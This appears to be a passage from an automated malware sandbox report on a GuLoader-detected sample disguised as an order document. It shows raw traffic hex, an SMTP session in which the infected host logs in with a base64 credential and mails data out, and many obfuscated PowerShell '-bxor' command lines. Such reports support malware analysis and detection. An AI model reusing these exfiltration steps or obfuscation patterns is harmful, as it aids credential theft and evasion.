                                                            Oct 5, 2022 09:36:17.544440985 CEST142INData Raw: 70 42 3e 2d 7f 16 79 e2 ca bf 5c 2e 47 91 fb fd 16 92 ba 48 0c fe f7 8b c6 20 27 ce 01 5f 5a 20 3f 9f 37 b4 43 3e 8b bb 2a 99 65 8c 24 22 e8 25 cd ac 2a 20 0f dd b9 c9 f2 db ac b0 71 94 e6 cb df 77 b9 31 93 bf bd cb 20 88 31 ed c1 82 81 1b ab 20
                                                            Data Ascii: pB>-y\.GH '_Z ?7C>*e$"%* qw1 1 X:G 6f'y>d;3QK\38NG.CMJQpS`"isC)@3wIoj}lG?.1greOiO-gO}ss`0vx*}!"qG/eLT
                                                            Oct 5, 2022 09:36:17.544852018 CEST143INData Raw: 03 04 1b 15 89 5a 90 5b 10 97 c0 3c 8d ad 4c 61 19 55 fc f4 40 0e 21 ba 93 9e 8f c8 b9 f7 56 92 69 54 fc 40 c7 5f 82 d0 d1 d4 18 76 1e 5f 6b 50 83 fe 3c 4a 2b a6 55 ee 14 9c 1d a7 bf 31 77 a9 ce d4 4d c6 64 1c 1c 41 65 f4 64 82 ec 46 5b 09 8b f8
                                                            Data Ascii: Z[<LaU@!ViT@_v_kP<J+U1wMdAedF[Tu"nbm4!R\e$-ACe@8q-o?m#ObT=9rQQF7qcpEHFs+~I%\Z%Lk:kkUPD:
                                                            Oct 5, 2022 09:36:17.544922113 CEST145INData Raw: 71 73 f2 bb d5 5c 1c ff 43 8a e6 22 ba 8c e2 a4 69 8b 21 49 7f d6 33 b4 78 96 6b 7c 9c 92 e6 3f 27 cf af ef 83 d6 56 e3 b1 b0 66 73 f7 23 d3 68 3b b1 d2 ab 9c ca a3 31 b8 cf c6 31 1a 23 3a 60 d7 48 ce 1a 3f de 68 3a ac 49 33 a6 5e 2b 57 6b 2c fe
                                                            Data Ascii: qs\C"i!I3xk|?'Vfs#h;11#:`H?h:I3^+Wk,e~[+]Pt w>Rb)t/kqKXw|?!+T1I{b'(MzICTiR_rbx!J$m4r;~%rG"r?%A
                                                            Oct 5, 2022 09:36:17.544976950 CEST146INData Raw: 57 72 e1 17 f7 33 db 83 16 f7 b1 f4 9c 68 8a 13 22 ee 28 f6 84 02 18 05 c6 3e 02 f2 ca a5 8b 73 84 e3 db 98 d4 bb 31 9f c3 a0 e6 00 f6 26 e7 e9 be a9 5e a3 fe 5e 03 a4 a7 78 41 e3 5e c8 dd e1 94 7d d2 86 0e a9 2d 27 1b d1 3c b6 87 74 42 33 d9 85
                                                            Data Ascii: Wr3h"(>s1&^^xA^}-'<tB3Xp>ph4Mkw`g7u{g3`.Td>~#S-w_of0%lDd,@;{hPeIiORg[:2a%|od9SIRUoENW_cU
                                                            Oct 5, 2022 09:36:17.545041084 CEST147INData Raw: f0 56 2e 69 54 fc ca a5 1d 95 fe 3d 4d 18 70 05 4e 6b b4 81 fe 3c 4a 97 a6 55 ee a9 87 d1 e0 97 f5 74 81 53 d2 65 5a 4c 80 16 69 ab dc 77 b4 c6 61 09 09 81 5a 4d 9a 6c 1b bc be b8 7f 7c d3 a7 9a bd fb 3c d1 ee e1 10 42 d4 f4 70 67 83 7a 35 6a c1
                                                            Data Ascii: V.iT=MpNk<JUtSeZLiwaZMl|<Bpgz5jtBmCmP{H#c#ZZ1\kKZ7(8_W%[`IyBD+qcmEVD{b&~.I25={Z%Lm6+l'/YWVB?#UD//$7vIu&<^h6<
                                                            Oct 5, 2022 09:36:17.545118093 CEST149INData Raw: 6c e7 1d 3a cd be 01 a8 8c 56 ef bb b2 60 41 ad 23 d2 62 54 04 d2 5d 95 a5 10 3f b8 c5 d9 3b 0d 28 3a 7e dc 5f 30 01 13 dd 71 29 a7 49 22 be 43 d5 56 49 23 fc 0a 57 7a 5b 21 de ca b7 fc 4b 7e 90 17 b9 8e c9 c9 81 da ec e5 30 e8 95 5f 09 38 d6 9b
                                                            Data Ascii: l:V`A#bT]?;(:~_0q)I"CVI#Wz[!K~0_8c:r9buIfkD?!"}%EjXply1&M{_<TS$}GATrj=]{4l ?~>B"}?V}A+{%b>Z{H3}Zslo


                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                            Oct 5, 2022 09:37:54.844677925 CEST58749842208.91.199.224192.168.11.20220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                            Oct 5, 2022 09:37:54.845031023 CEST49842587192.168.11.20208.91.199.224EHLO 849224
                                                            Oct 5, 2022 09:37:55.007831097 CEST58749842208.91.199.224192.168.11.20250-us2.outbound.mailhostbox.com
                                                            250-PIPELINING
                                                            250-SIZE 41648128
                                                            250-VRFY
                                                            250-ETRN
                                                            250-STARTTLS
                                                            250-AUTH PLAIN LOGIN
                                                            250-AUTH=PLAIN LOGIN
                                                            250-ENHANCEDSTATUSCODES
                                                            250-8BITMIME
                                                            250-DSN
                                                            250 CHUNKING
                                                            Oct 5, 2022 09:37:55.009535074 CEST49842587192.168.11.20208.91.199.224AUTH login c2xpbXNoYWR5QGp1YmFuYS5jYW0=
                                                            Oct 5, 2022 09:37:55.174710989 CEST58749842208.91.199.224192.168.11.20334 UGFzc3dvcmQ6
                                                            Oct 5, 2022 09:37:55.342622995 CEST58749842208.91.199.224192.168.11.20235 2.7.0 Authentication successful
                                                            Oct 5, 2022 09:37:55.343780994 CEST49842587192.168.11.20208.91.199.224MAIL FROM:<slimshady@jubana.cam>
                                                            Oct 5, 2022 09:37:55.508804083 CEST58749842208.91.199.224192.168.11.20250 2.1.0 Ok
                                                            Oct 5, 2022 09:37:55.509232044 CEST49842587192.168.11.20208.91.199.224RCPT TO:<slimshadyrrr@jubana.cam>
                                                            Oct 5, 2022 09:37:55.722536087 CEST58749842208.91.199.224192.168.11.20250 2.1.5 Ok
                                                            Oct 5, 2022 09:37:55.722939014 CEST49842587192.168.11.20208.91.199.224DATA
                                                            Oct 5, 2022 09:37:55.886796951 CEST58749842208.91.199.224192.168.11.20354 End data with <CR><LF>.<CR><LF>
                                                            Oct 5, 2022 09:37:55.889211893 CEST49842587192.168.11.20208.91.199.224.
                                                            Oct 5, 2022 09:37:56.190964937 CEST58749842208.91.199.224192.168.11.20250 2.0.0 Ok: queued as 9D6A6A8011B
                                                            Oct 5, 2022 09:39:31.808327913 CEST49842587192.168.11.20208.91.199.224QUIT
                                                            Oct 5, 2022 09:39:31.972100019 CEST58749842208.91.199.224192.168.11.20221 2.0.0 Bye

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Target ID:1
                                                            Start time:09:34:58
                                                            Start date:05/10/2022
                                                            Path:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
                                                            Imagebase:0x400000
                                                            File size:152504 bytes
                                                            MD5 hash:297CEE2E9339AB19CB96A073CA8BA85F
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low

                                                            Target ID:3
                                                            Start time:09:35:00
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x6B6570CB -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Target ID:4
                                                            Start time:09:35:00
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Target ID:5
                                                            Start time:09:35:01
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x656C3197 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Target ID:6
                                                            Start time:09:35:01
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Target ID:7
                                                            Start time:09:35:02
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x3A3A41D7 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Target ID:8
                                                            Start time:09:35:02
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Target ID:9
                                                            Start time:09:35:03
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x656176C0 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Target ID:10
                                                            Start time:09:35:03
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Target ID:11
                                                            Start time:09:35:03
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x46696EC0 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            Target ID:12
                                                            Start time:09:35:04
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:13
                                                            Start time:09:35:04
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x41286F85 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:14
                                                            Start time:09:35:04
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:15
                                                            Start time:09:35:05
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x72342289 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:16
                                                            Start time:09:35:05
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:17
                                                            Start time:09:35:06
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x20692295 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:18
                                                            Start time:09:35:06
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:19
                                                            Start time:09:35:06
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x78383295 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:20
                                                            Start time:09:35:07
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:21
                                                            Start time:09:35:07
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x30303295 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:22
                                                            Start time:09:35:07
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:23
                                                            Start time:09:35:08
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x302C22CC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:24
                                                            Start time:09:35:08
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:25
                                                            Start time:09:35:09
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x20302E85 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:26
                                                            Start time:09:35:09
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:27
                                                            Start time:09:35:09
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x70203289 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:28
                                                            Start time:09:35:09
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:29
                                                            Start time:09:35:10
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x20692291 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:30
                                                            Start time:09:35:10
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:31
                                                            Start time:09:35:11
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x2C206B85 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:32
                                                            Start time:09:35:11
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:33
                                                            Start time:09:35:12
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x30783A95 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:34
                                                            Start time:09:35:12
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:35
                                                            Start time:09:35:12
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x2C206B85 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:36
                                                            Start time:09:35:12
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:37
                                                            Start time:09:35:13
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x30296B8B -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:38
                                                            Start time:09:35:13
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:39
                                                            Start time:09:35:14
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x723322FC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:40
                                                            Start time:09:35:14
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:41
                                                            Start time:09:35:15
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x6B6570CB -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:42
                                                            Start time:09:35:15
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:43
                                                            Start time:09:35:16
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x656C3197 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:44
                                                            Start time:09:35:16
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:45
                                                            Start time:09:35:16
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x3A3A54CC -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:46
                                                            Start time:09:35:17
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:48
                                                            Start time:09:35:17
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x727477C4 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:
                                                            Has administrator privileges:
                                                            Programmed in:C, C++ or other language

                                                            Target ID:49
                                                            Start time:09:35:17
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6f2610000
                                                            File size:875008 bytes
                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language

                                                            Target ID:50
                                                            Start time:09:35:18
                                                            Start date:05/10/2022
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):
                                                            Commandline:powershell.exe 0x6C416EC9 -bxor 677
                                                            Imagebase:
                                                            File size:433152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
